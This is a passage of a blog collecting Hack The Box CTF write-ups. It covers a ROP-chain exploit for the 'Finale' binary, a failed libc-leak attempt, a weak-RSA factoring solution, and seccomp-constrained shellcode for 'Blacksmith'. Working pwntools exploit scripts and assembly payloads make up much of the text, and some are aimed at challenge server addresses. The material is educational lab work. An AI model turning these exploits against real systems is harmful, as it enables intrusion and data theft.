        printf("%s\n[Strange man in mask]: Sorry, you are not allowed to enter here!\n\n","\x1b[1;31m");
      }
      return;
    }
    if (secret[i] == '\n') {
      secret[i] = '\0';
      goto LAB_CHECK_SECRET;
    }
    i++;
  } while( true );
}

Main function

As we can see, the secret for the binary is s34s0nf1n4l3b00 and finale() gets called after the correct secret has been entered.

Finale() analysis

As said, main() calls finale() after the secret has been entered. This function asks us for a wish for the next year.

void finale()
{
  char buf[64];
  
  printf("\n[Strange man in mask]: Season finale is here! Take this souvenir with you for good luck: [%p]",buf);
  printf("\n\n[Strange man in mask]: Now, tell us a wish for next year: ");
  fflush(stdin);
  fflush(stdout);
  read(0,buf,0x1000);
  write(1,"\n[Strange man in mask]: That\'s a nice wish! Let the Spooktober Spirit be with you!\n\n",0x54);
  return;
}

Finale function

We are given stack leak in the form of char* buf. Furthermore, there is a stack buffer overflow: the buffer length is 64 and we are writing 0x1000 (4096) bytes. In Ghidra we can see that the offset to the return address from the base of buf is 0x48 bytes.

GOT

Considering checksec said No PIE (0x400000), we can use the Procedural Linking Table (PLT) section of the binary. This means we could open a potential flag.txt using open(), read() and write().

Developing the ROP chain

Considering the protections in the binary listed by checksec state that No eXecute is enabled, we need to use Return Oriented Programming (ROP) chains. We want to do the following in the payload:

fd = open("flag.txt", 0);
n_read = read(3, buf, size);  // 3 since fd == 3 can be expected
write(1, buf, n_read);

We have access to:

Binary/ELF
GOT and PLT (linked functions)
Functions (built-in functions)
Stack

Using print(*ELF('challenge/finale').plt.keys()), we can see that the following functions are available in the PLT sections:

strncmp puts write printf alarm
close read srand time fflush
setvbuf open __isoc99_scanf rand

Available functions in the PLT section

Now we have the right functions and have access to the stack (for "flag.txt"), we need to need a way to pass function arguments. The x64 calling convention states that function arguments should be passed (in order) via RDI, RSI, RDX, RCX, R8, R9. This means that we need to control the RDI, RSI, and RDX registers via pop instructions (called gadgets) in the ROP-chain in order to pass 3 arguments to open(), read(), and write(). We can search for such gadgets using ropr: a blazing fast multithreaded ROP Gadget finder. Below is my search regex filter for ropr:

$ ropr -R '^pop (rdi|rsi|rdx); ret;' challenge/finale  
0x004012d6: pop rdi; ret;
0x004012d8: pop rsi; ret;

Sadly, ropr can't find any gadgets for the RDX register. Even after trying many more search queries (like EDX and DX), I couldn't find any results. This means that we need to find a workaround for a high-enough RDX value for read(..., ..., size=RDX).

GNU Debugger (GDB)

In order to find out a way to get a high RDX value, I used GDB with the Pwndbg plug-in (please say /pwn-dbg/ and not /poʊndbæg/ as the repo proposes). To see the RDX value during runtime, we can use the GDB functions in pwntools:

#!/usr/bin/env python3

from pwn import ELF, remote, gdb, p64, u64
import time

e = ELF('challenge/finale')
p = e.process()

# 0x004012d6: pop rdi; ret;
pop_rdi = p64(0x4012d6)

# 0x004012d8: pop rsi; ret;
pop_rsi = p64(0x4012d8)

def leak_func(address):
    payload = b'A'*0x48
    payload += pop_rdi + p64(address) + p64(e.plt.puts) + p64(e.sym.finale)

    p.sendafter(b"next year: ", payload)
    p.recvuntil(b"you!\n\n")  # clear buffer
    return u64(p.recvuntil(b"\n")[:-1].ljust(8, b'\x00'))


p.sendlineafter(b"secret phrase: ", b"s34s0nf1n4l3b00")
p.recvuntil(b"good luck: [")  # clear buffer for next address read

leak = int(p.recvuntil(b"]")[:-1], 16)
print("leak @", hex(leak))

file = b'flag.txt\0'
rbp = leak + 0x170

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(leak)
payload += pop_rsi + p64(0)
payload += p64(0x4014c7)

gdb.attach(p, 'b *0x4014c7\ncontinue')
p.sendafter(b"next year: ", payload)

while True:
    print(p.recv())

Payload for opening GDB at the open() call

0x00000000004014e0 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────
 RAX  0x3
 RBX  0x0
 RCX  0x7ffc887475a0 —▸ 0x7f76d739e2e0 ◂— 0x0
 RDX  0x8
*RDI  0x3
 RSI  0x7ffc887475a0 —▸ 0x7f76d739e2e0 ◂— 0x0
 R8   0x3c
 R9   0x7ffc887451bc ◂— 0x3c00007f76
 R10  0x0
 R11  0x246
 R12  0x7ffc887475f8 —▸ 0x7ffc88748289 ◂— '~/Documents/ctf/htb/finale/challenge/finale'
 R13  0x401492 (main) ◂— endbr64 
 R14  0x403d70 (__do_global_dtors_aux_fini_array_entry) —▸ 0x4012a0 (__do_global_dtors_aux) ◂— endbr64 
 R15  0x7f76d739d040 (_rtld_global) —▸ 0x7f76d739e2e0 ◂— 0x0
 RBP  0x7ffc887475c0 —▸ 0x7ffc887475f0 ◂— 0x1
 RSP  0x7ffc887474c0 ◂— 0xe193b4642436643b
*RIP  0x4014e0 (main+78) ◂— call 0x401170
─────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────
   0x4014cf      lea    rcx, [rbp - 0x20]
   0x4014d3      mov    eax, dword ptr [rbp - 0xc]
   0x4014d6      mov    edx, 8
   0x4014db      mov    rsi, rcx
   0x4014de      mov    edi, eax
 ► 0x4014e0      call   read@plt                      
        fd: 0x3 (~/Documents/ctf/htb/finale/flag.txt)
        buf: 0x7ffc887475a0 —▸ 0x7f76d739e2e0 ◂— 0x0
        nbytes: 0x8
 
   0x4014e5      lea    rax, [rbp - 0x20]
   0x4014e9      mov    rsi, rax
   0x4014ec      lea    rax, [rip + 0x1425]
   0x4014f3      mov    rdi, rax
   0x4014f6     mov    eax, 0

GDB breakpoint dump

As we can see, RDX is equal to 8 which means only 8 bytes of the flag get read and written to stdout. Since we need to read at least 32 bytes, we need to find a way of manipulating the RDX register. We could do this by:

Calling open("flag.txt", 0) using the PLT section in the ELF (which only executes the function and immediately returns after)
Manipulate RDX
Calling 0x4014e0 so we read() with the manipulated RDX and write() to stdout all at once.

As said, I tried finding gadgets which sadly did not work. After manually analyzing the binary I happened to see the following gadget:

      00401476 ba 54 00     MOV       EDX,0x54
               00 00
      0040147b 48 8d 05     LEA       RAX,[s__[Strange_man_in_mask]:_That's_a_ = "\n[Strange man in mask]: 
               2e 14 00 
               00
      00401482 48 89 c6     MOV       RSI=>s__[Strange_man_in_mask]:_That's_a_ = "\n[Strange man in mask]: 
      00401485 bf 01 00     MOV       EDI,0x1
               00 00
      0040148a e8 a1 fc     CALL      ::write                         ssize_t write(int __fd, void
               ff ff
      0040148f 90            NOP
      00401490 c9            LEAVE
      00401491 c3            RET

Part of the finale() function

As we can see, the EDX register is set to 0x54. This means we will read and write 84 bytes of the flag, which means it's more than enough and that we have completed the final part of the ROP chain:

open@PLT("flag.txt", 0)
finale() // to set RDX to 0x54
Set RDI to 3
Set RSI to the buffer buf
JMP 0x4016e0

A.k.a.:

file = b'flag.txt\0'
rbp = leak - 0x5000

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(leak)
payload += pop_rsi + p64(0)
payload += p64(e.plt.open)
payload += p64(e.sym.finale)  # set RDX

p.sendafter(b"next year: ", payload)

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(3)
payload += pop_rsi + p64(rbp-0x20)
payload += p64(0x4014e0)  # read() -> write()

p.sendafter(b"next year: ", payload)

The Python representation of the ROP chain

Retrieving the flag

So, the grant scene of the script is:

#!/usr/bin/env python3

from pwn import ELF, remote, gdb, p64, u64
import time

e = ELF('challenge/finale')
is_remote = False
if is_remote:
    p = remote("167.99.204.5", 31431)
else:
    p = e.process()

# 0x004012d6: pop rdi; ret;
pop_rdi = p64(0x4012d6)

# 0x004012d8: pop rsi; ret;
pop_rsi = p64(0x4012d8)

def leak_func(address):
    payload = b'A'*0x48
    payload += pop_rdi + p64(address) + p64(e.plt.puts) + p64(e.sym.finale)

    p.sendafter(b"next year: ", payload)
    p.recvuntil(b"you!\n\n")  # clear buffer
    return u64(p.recvuntil(b"\n")[:-1].ljust(8, b'\x00'))


p.sendlineafter(b"secret phrase: ", b"s34s0nf1n4l3b00")
p.recvuntil(b"good luck: [")  # clear buffer for next address read

leak = int(p.recvuntil(b"]")[:-1], 16)
print("leak @", hex(leak))

file = b'flag.txt\0'
rbp = leak - 0x5000

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(leak)
payload += pop_rsi + p64(0)
payload += p64(e.plt.open)
payload += p64(e.sym.finale)  # set RDX

p.sendafter(b"next year: ", payload)

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(3)
payload += pop_rsi + p64(rbp-0x20)
payload += p64(0x4014e0)  # read() -> write()

p.sendafter(b"next year: ", payload)
while True:
    print(p.recv())

Failed attempt

In my failed attempt I tried to get remote code execution using leaked libc offsets, but it turned out that the libc version on the server was custom and it was intended to prevent this solution. I had to find out by asking the creator of the challenge.

The way we leak libc addresses is by calling puts() in the PLT section with the argument being a libc function linked in the GOT section. So, we need to call puts(const char *string); with argument string via the RDI register in AMD64. To control the RDI register, we use a ROP chain that pops RDI:

$ ropr -R 'pop rdi; ret;' challenge/finale
0x004012d6: pop rdi; ret;

==> Found 1 gadgets in 0.004 seconds

Now we can pop a GOT function address into RDI and call puts() to leak the function offset. Let's run the following script with the server as target to get their libc version:

#!/usr/bin/env python3

from pwn import ELF, remote, gdb, p64, u64
import time

e = ELF('challenge/finale')
is_remote = False
if is_remote: 
    p = remote("161.35.173.232", 31394)
else:
    p = e.process()

# 0x004012d6: pop rdi; ret;
pop_rdi = p64(0x004012d6)

def leak_func(address):
    payload = b'A'*0x48
    payload += pop_rdi + p64(address) + p64(e.plt.puts) + p64(e.sym.finale)
    
    p.sendafter(b"next year: ", payload)
    p.recvuntil(b"you!\n\n")  # clear buffer
    return u64(p.recvuntil(b"\n")[:-1].ljust(8, b'\x00'))

p.sendlineafter(b"secret phrase: ", b"s34s0nf1n4l3b00")
p.recvuntil(b"good luck: [")  # clear buffer for next address read

leak = int(p.recvuntil(b"]")[:-1], 16)
print("leak @", hex(leak))

#gdb.attach(p)
for name, addr in e.got.items():
    print(name, "@", hex(leak_func(addr)))

The payload for leaking LIBC addresses

The output is the following:

__libc_start_main @ 0x7ff2d7c29dc0
__gmon_start__ @ 0x0
stdout @ 0x7ff2d7e1a780
stdin @ 0x7ff2d7e19aa0
strncmp @ 0x0
puts @ 0x7ff2d7c80ed0
write @ 0x7ff2d7d14a20
printf @ 0x7ff2d7c60770
alarm @ 0x7ff2d7cea5b0
close @ 0x0
read @ 0x7ff2d7d14980
srand @ 0x7ff2d7c460a0
time @ 0x7ffdaafcfc60
fflush @ 0x7ff2d7c7f1b0
setvbuf @ 0x7ff2d7c81670
open @ 0x7ff2d7d14690
__isoc99_scanf @ 0x7ff2d7c62110
rand @ 0x7ff2d7c46760

When I enter those symbols and addresses into a libc-leak website like libc.rip, I cannot find a single libc version. That means that there's a custom libc version, which means we can't call system() since we don't have the address.

WeakRSA (HackTheBox)

statusquo — Thu, 24 Nov 2022 21:27:26 GMT

G'day everyone! In this write-up we are going to solve the retired WeakRSA challenge on Hack The Box. In order to do so however it is important you understand some of the basics. You will learn

Basic RSA
Decoding pem formats

How does RSA work?

RSA is an encryption algorithm which has been around since 1977. To use it you will need to chose two different large prime numbers these will be named p and q.

By multiplying p and q together you get your modulus named N. Then you can choose your exponent which we will name e. Now you are ready to encrypt your secret message. Using RSA our encryped message will be calculated like this : (message^e) mod N

In python3 it can be computed like this :

pow(message,e,N)

Decrypting RSA

Decrypting will be a little bit harder. To do so we first must find phi φ(N). We can do so like this : φ(N) = (p-1) * (q-1).

Remember that we need to know p and q to decrypt this is important. We are finally ready to calculate d, the modular inverse of e. This can be done by using the extended euclidean algorithm. You don't have to understand how (or why) it works but saying it will make you look smart. In python I use xgcd from the libnum library. d will be the first value the algorithm outputs.

d = xgcd(e,φN) [0]

The plaintext can then be calculated :

plaintext = pow(encrypted, d, N)

Solving the challenge

After downloading and extracting the zip we get a key encoded in the pub format. We can decode it using python or just by using an online tool which gives us the following data :

The Modulus being the public key N and the public exponent is our e

We know that the modulus is just p * q but it will take forever to factor such a large number. If only there was a quicker method. Wait a minute what if there are databases containing the factors of large number... That would be really helpful. After some searching I encountered this site. Let's try to input our N :

Looks like we found p and q. From here we can get the flag using python :

Solve

solve.py

932 Bytes

The script should output the flag :

HTB{s1mpl3_Wi3n3rs_4tt4ck}

The lesson this challenge is trying to teach us is that p and q should be above 512 digits. This way the public key is less likely to be factorized, so p and q cant be found and your secret messages wont be able to be decrypted.

Blacksmith (HackTheBox)

notselwyn — Sun, 20 Nov 2022 12:00:00 GMT

Hey all. Today we're going to discuss the retired Blacksmith challenge on HackTheBox. The description on HackTheBox is as follows:

You are the only one who is capable of saving this town and bringing peace upon this land! You found a blacksmith who can create the most powerful weapon in the world! You can find him under the label "./flag.txt".

In this write-up, we will learn about seccomp, writing assembly, and performing syscalls.

Summary

First looks
Finding vulnerability primitives
Developing AMD64 (x86_64) assembly
Retrieving the flag

First looks

We are given the blacksmith executable binary. Upon running the binary, we are presented with a menu to trade items:

$ ./blacksmith
Traveler, I need some materials to fuse in order to create something really powerful!
Do you have the materials I need to craft the Ultimate Weapon?
1. Yes, everything is here!
2. No, I did not manage to bring them all!
> 1
What do you want me to craft?
1. sword
2. shield
3. bow
> 3
This bow's range is the best!
Too bad you do not have enough materials to craft some arrows too..

The program output

Usually, I start by checking the binary's security using pwntools' checksec. In this case, the security of blacksmith binary is:

$ checksec blacksmith
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments

The checksec output

The fields in checksec mean the following:

Arch: the CPU architecture and instruction set (x86, ARM, MIPS, ...)
RELRO: Relocation Read-Only - secures the dynamic linking process
Stack Canaries: protects against stack buffer overflow attacks
NX: No eXecute - write-able memory cannot be executed
PIE: Position Independable Executable - address randomization
RWX: Read Write Execute - there's memory that's RWX

The logical conclusion is that we need to write a shellcode to the RWX memory to read out flag.txt (based on the challenge description).

Finding vulnerability primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork. An example of primitives working together is as follows:

an information leak primitive to leak an address
an arbitrary write primitive to control the execution flow

... which can work together by controlling the execution flow by writing a leaked address.

Main analysis

When I want to find vulnerability primitives, I open the binary in Ghidra, Ghidra is a reverse engineering tool developed by the NSA (yes, that NSA). I start off analyzing a binary at the main function. In this case, it looked like the following:

void main(void)
{
  size_t __n;
  long in_FS_OFFSET;
  int i_has_things;
  int i_option;
  char *local_20;
  char *local_18;
  long __can_token;
  
  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  setup();
  // ...
  __isoc99_scanf("%d",&i_has_things);
  if (i_has_things != 1) {
    puts("Farewell traveler! Come back when you have all the materials!");
    exit(34);
  }
  printf(s_What_do_you_want_me_to_craft?_1._001012e0);
  __isoc99_scanf("%d",&i_option);
  sec();
  if (i_option == 2) {
    shield();
  } else if (i_option == 3) {
    bow();
  } else if (i_option == 1) {
    sword();
  } else {
    write(STDOUT_FILENO,local_18,strlen(local_18));
    exit(261);
  }
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}

Decompilation of the main function

So, the main function does the following:

setup()
sec()
shield(), bow() or sword()

In addition to that, the main function uses canary tokens in variable __can_token. As you can see, if __can_token is not equal to the original value, it means that stack corruption has been detected and hence, __stack_chk_fail is called which exits the program.

The function setup removes the buffer for stdout and stdin, which is standard and hence not interesting. In contrast, the sec function is interesting.

Sec function

void sec(void)

{
  void* ctx;
  long in_FS_OFFSET;
  long __can_token;
  
  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  // ...
                    // allow sys_read, sys_write, 
                    // sys_open, sys_exit
  ctx = seccomp_init(0);
  seccomp_rule_add(ctx,0x7fff0000,2,0);
  seccomp_rule_add(ctx,0x7fff0000,0,0);
  seccomp_rule_add(ctx,0x7fff0000,1,0);
  seccomp_rule_add(ctx,0x7fff0000,60,0);
  seccomp_load(ctx);
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}

The sec function

We can see that the sec function primarily creates an allow list using seccomp of the syscalls sys_read, sys_write, sys_open, and sys_exit. (Note that the naming convention for internal syscall functions is a sys_ prefix. When we say sys_read, we mean the syscall read.) By doing this, the developer of the program prevents us from executing our shell on the server since we would need to sys_execve("/bin/sh", NULL, NULL) for that. Because sys_execve is not on the allow list, we cannot use it. Remember this for later.

Shield analysis

Furthermore, we have the shield(), bow() or sword() calls in main(). The bow() and sword() functions crash the program before a user can give input, which means that's irrelevant. So basically, the vulnerability must be in shield().

void shield(void)

{
  size_t strlen;
  long in_FS_OFFSET;
  char buf[72];
  long __can_token;
  
  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  strlen = ::strlen(s_Excellent_choice!_This_luminous_s_00101080);
  write(1,s_Excellent_choice!_This_luminous_s_00101080,strlen);
  strlen = ::strlen("Do you like your new weapon?\n> ");
  write(1,"Do you like your new weapon?\n> ",strlen);
  read(0,buf,63);
  (*(code *)buf)();
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
                    // WARNING: Subroutine does not return
    __stack_chk_fail();
  }
  return;
}

The shield function

What sticks out to me in this function is that we have user input and are calling a variable like a function using (*(code *)buf)();. The code (*(code *)buf)(); is equivalent to the ASM below:

00100dd9 48 8d 55     LEA       RDX, [RBP - 0x50]   ; code* RDX = &buf
         b0
00100ddd b8 00 00     MOV       RAX, 0x0
         00 00
00100de2 ff d2        CALL      RDX                 ; RDX()

ASM version of (*(code *)buf)();

The (*(code *)buf)(); function call executes the buf variable on the stack as if it was assembly. This means we can inject assembly into the program.

Developing AMD64 (x64_86) assembly

We have an arbitrary execution primitive so we need to write an assembly payload. The difficulty with this is that:

We have 63 bytes to work with:

  // shield() function
  read(STDIN_FILENO,buf,63);
  (*(code *)buf)();

Part of the shield() function

We can only use sys_read, sys_write, sys_open and sys_exit:

  // sec() function
  // allow sys_read, sys_write, 
  // sys_open, sys_exit
  ctx = seccomp_init(0);
  seccomp_rule_add(ctx,0x7fff0000,2,0);
  seccomp_rule_add(ctx,0x7fff0000,0,0);
  seccomp_rule_add(ctx,0x7fff0000,1,0);
  seccomp_rule_add(ctx,0x7fff0000,60,0);
  seccomp_load(ctx);

Part of the sec() function

We do not have a stack address (ASLR)

However, the challenge description told us that we need to read the flag.txt file. Hence, the strategy for this payload is opening flag.txt, reading flag.txt into a buffer, and writing the buffer to stdout.

To interact with those files, we need to utilize system calls ("syscalls"). Syscalls are essentially an ABI (binary API) with the Linux kernel which is like the god of the operating system. The kernel provides memory management, CPU scheduling, driver management, hardware IO, et cetera. If you want to learn more about the kernel, the book "Linux Kernel Development" by Robert Love is an excellent way to learn more about the kernel (I've read it).

I used a Linux x64 syscall table as a reference for using the syscalls. Essentially the code should do the following:

// sys_open(char* filename, int flags, int mode)
int fd = sys_open("flag.txt", 0, 0);  

// sys_read(int fd, char* buf, size_t count)
int written = sys_read(fd, buf, 0x9999);

// sys_write(int fd, char* buf, size_t count)
sys_write(1, buf, written);

C pseudocode of the ASM payload

I came up with the following ASM:

mov rax, 2
lea rdi, [rip+41]  ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall

mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, 30
syscall

mov rdx, rax
mov rax, 1
mov rdi, rax
syscall

Payload used to leak flag.txt

Since we have only 63 bytes to work with, I had to be creative. In assembly, most bytes are allocated to constant values like mov rax, 2 since it will store an 8-byte 0x00000000 00000002 into the instruction. That means we can save a lot of bytes by reusing register values.

I eventually refactored the payload into 46 bytes:

push r10
inc r10
mov rax, r10
lea rdi, [rip+31]  ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall

mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall

mov rdx, rax
pop rax
mov rdi, rax
syscall

The final compressed ASM payload

Retrieving the flag

Now we have a steady payload, we need to send it to the application. I made the following script using pwntools:

#!/usr/bin/python3

from pwn import remote, gdb, ELF, asm, context
import time

e = ELF('blacksmith')

is_remote = True
if is_remote:
    p = remote("64.227.36.64", 32615)
else:
    p = e.process()

context.binary = e.path  # set the pwntools context for asm()

p.sendlineafter(b"all!\n> ", b'1')
p.sendlineafter(b"\xf0\x9f\x8f\xb9\n> ", b'2')  # get to shield()

payload = asm(f'''push r10
inc r10
mov rax, r10
lea rdi, [rip+31]
xor rsi, rsi
xor rdx, rdx
syscall

mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall

mov rdx, rax
pop rax
mov rdi, rax
syscall''')

print(f"writing ASM with {len(payload)} bytes")

# payload = payload + filler + filename
payload += b"flag.txt"
print(f"writing ASM+filename with {len(payload)} bytes")

p.sendafter(b"weapon?\n> ", payload)
while True:
    print(p.recvline())

The final script used for sending the payload to the application